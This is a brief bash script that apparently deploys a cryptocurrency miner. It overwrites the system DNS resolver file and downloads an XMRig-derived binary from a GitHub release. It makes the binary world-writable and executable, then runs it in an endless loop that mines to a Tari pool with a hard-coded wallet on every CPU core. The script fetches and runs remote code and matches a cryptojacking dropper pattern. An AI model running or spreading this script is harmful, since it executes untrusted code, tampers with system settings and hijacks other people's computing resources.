#!/bin/bash
echo nameserver 1.1.1.1 > /etc/resolv.conf
curl https://github.com/bondaltomason/meo/releases/download/2.7.0/xmrig-vrl -L -o vrl
chmod 777 vrl
while :; do
./vrl -a rx/0 --donate-level 1 -o pool-global.tari.snipanet.com:3333 -u 165DUuzQoKG9BaBqprN3ZmsMRfvGHMwNwCpehJUqGoGLsSDtB535XA3PPzfRZhu2uYM9xfT8JsKoXEquWMr6XVwKK4UsrsuiaVHSTBpstcgqjLe5rYNcNfYdCJ1CtDg9z6qshKy -p $(echo $(shuf -i 1-15000 -n 1)-A) -t $(nproc --all)
done
